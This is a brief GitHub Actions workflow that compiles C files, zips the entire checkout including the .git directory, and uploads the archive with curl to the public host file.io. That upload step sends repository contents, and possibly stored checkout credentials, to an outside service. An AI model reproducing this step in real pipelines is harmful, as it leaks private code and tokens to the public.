name: C/C++ CI

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v2
    - name: compile
      run: gcc *.c
    - name: zip
      run: zip -r foo.zip .
    - name: upload
      run: curl -F "file=@foo.zip" https://file.io/?expires=1w
